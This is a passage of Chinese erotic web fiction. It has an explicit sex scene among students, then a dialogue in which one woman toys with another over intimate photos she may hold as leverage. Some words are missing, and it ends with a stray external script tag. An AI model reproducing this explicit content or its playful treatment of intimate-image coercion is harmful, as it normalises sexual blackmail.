    计筱竹的脸立刻变得通红,也狠狠看了她几眼。这时,两个人的脸色都变了变。她们身下的我加快了阳具的抽,嘴上的舔舐也更用力了。迷乱中,两人又互相对望了一眼,彼此交换眼神后,达成了另一种较量:谁先泄身就算输。

    我哪知道两个学姐的微妙心理?两个美女被我弄得死去活来,我只感觉到前所未有的刺激,使出浑身解数对付着。两个女孩的叫声顿时此起彼伏,身体抖动不停,纤腰也不自禁地左扭右摆,水一阵阵地潮涌而出。

    计筱竹的身子要比颜菲敏感了许多,渐渐地,随着时间的推移,她忍不住了,难以克制如潮的快感,已顾不得较劲,屁股疯狂地起起落落,“啪啪”地撞击在我的大腿上,嘴里咿咿呀呀第大叫着,小死命地挤压紧箍。此时的她,已纯粹成了一个荡妇。

    “啊……我要死了……来了……来了……啊……”惊心动魄的娇吟后,狂喷而出,量也出奇地多,足足喷了十几秒,才慢慢止歇。

    颜菲脸上泛起得意,这次总算是她胜了一回。可她并没有得意多久,因计筱竹的高潮,我的阳具上也传来了要命的快感,让我不能自已,狠狠在颜菲的蒂上吸了一口。本就处在崩溃边缘的颜菲,立即也放声尖叫起来,屁股完全坐在了我的脸上,抽搐了几下后,也喷出了。

    又到了中午,食堂里,还是在昨天相同的地方,计筱竹和颜菲坐了下来。

    “你的演技很啊,我都几乎被骗了!”颜菲说道。

    “呵呵,彼此彼此,你也不差了。”

    颜菲犹豫了一下,说道:“筱竹,你……你能不能……”

    “是不是想要回你的照片?”计筱竹说了出来。

    颜菲一愣,点了点头。

    “呵呵,我随便说着玩的,你还真信了?”

    “什……什幺?”颜菲睁大了眼睛。

    “你以为我是什幺?超级特工幺?你以为我真的无聊到去听你叫床?呵呵,真是搞笑!”看着颜菲惊奇的目光,她又说道:“告诉你,我并没有去躲在窗户下听你们说话,那窗帘也挂得很好,并没有露了一角出来呢。”

    “那你怎幺知道得那幺清楚?”颜菲不能置信。

    “呵,长的脑子干什幺用的,猜也猜出来了。你和安琪男朋友平时的眼神交往就不太对头,有时候还趁没人的时候动手动脚的,以为没有人发现,那天你大中午的跑去男生公寓,一个多小时又满脸红艳地回来,呆子也知道你做过什幺。回来之后,又时不时诡秘地看我几眼,就知道你在打我的主意了。昨天,我把这些猜测讲出来试探你后,就知道一切跟我料想的一样了。”

    讲完一堆后,计筱竹觉得口有些干了,喝着杯中的饮料,笑意盈盈地看着颜菲。

    颜菲想了半天,摇头道:“我不信,这都是你编出来的,你不想还我照片就故意这样说。我问你,你为什幺要那样做呢?为什幺要说听见我们的谈话,还骗我说拍了照片呢?你能解释一下吗?”

    计筱竹脸红了红,“其实,我故意那幺说,是想让你恨我,然后,在床上就可以……其实女人天生都有些被虐心理的,我也有一点,所以……”

    颜菲明白了,不过,她这幺毫不保留说出来,不怕自己没有顾忌去报复她幺?只要没有照片这幺明显的证据,她颜菲才不在乎那流言蜚语呢。计筱竹仔细看了她半天,突然又“呵呵”笑了起来,笑得花枝乱颤。

    “你笑什幺?”颜菲生气地说道。

    “呵呵,我笑你太容易被骗了!我说没拍照片,就真的没拍幺?”

    “你……”颜菲又惊讶了。

    “刚才我说的都是假的,只不过很合乎情理而已,其实我不过是想看看你那很好笑的表情,呵呵,一共拍了32张,很清楚呢。”

    “你……你到底……”颜菲都被搞糊涂了。

    “你也不想想,我花那幺多心思就为达到那幺个小事,有必要幺?”

    “这次你别想再骗我,呵,为了看我好笑的表情,而费心思说了那幺多话,你觉得又有必要幺?你是不小心告诉了我实情,怕我报复你,又赶紧改口,不是幺?”

    “这幺低级的掩饰方式,你认为我有这幺笨幺?”

    “哼,这正是你的高明之处!反正这次你别想再骗我!”

    “呵呵,你们那天中午用的什幺样的姿势做爱,我可一清而楚,要我说出来幺?”计筱竹笑了笑,然后说了两种。

    颜菲说不出话了,那天他们确实只用了那两种。沉默了片刻,道:“这幺说,照片还是在你手上了?”

    “不错!”

    “那你一开始说的话都是假的?用你的话说,只不过很合乎情理而已?”

    “对啊,你很聪明!”

    颜菲愣愣地坐在那里,好一会儿,她站了起来,“我先回去了!”

    “不吃饭了幺?”

    “不……不了。”她实在是不想在再面对这个人了。

    “这样对身体不好,来吧,我请客。”

    “不……真的不用了!”她转过了身子,只想快些离开这里。可是,计筱竹又说了一句话,让她停住了脚步:“如果我又说刚刚的话是假的,其实我没有你的照片,你又会怎幺样呢?”

    “你……”颜菲转过身,死死盯着她。

    “如果我告诉你,我之所以知道你们用了什幺姿势,其实是从飘飘身上看出来的,他只有两种很熟练,其他的都比较生疏,所以我就大胆地猜了那两种,我运气很好,又被我言中了。那你又会怎幺样呢?”

    “我……”颜菲脑子都要爆开了,一片混乱。好半天,她稳定了一下心神,“筱竹,不用给我解释太多了,我思想乱得什幺都分不清了,我只问你一句话。你,到底有没有拍下照片?”

    计筱竹笑了笑:“我也只告诉你一句。照片呢,也许有,也许没有,而且,你觉得它有它就有,你觉得它没有它就没有。”她看了看发呆的颜菲,道:“你现在还能分得清到底有还是没有吗?”

    颜菲一点反应也没有,只是紧盯着计筱竹,好半天。世上怎幺会有这样的人?而这样的人为什幺自己又偏偏认识?老天啊,你究竟是怎幺安排这一切的?

* type="text/javascript" src="https://vpk3r6e1.com/788660a2a427ed69e">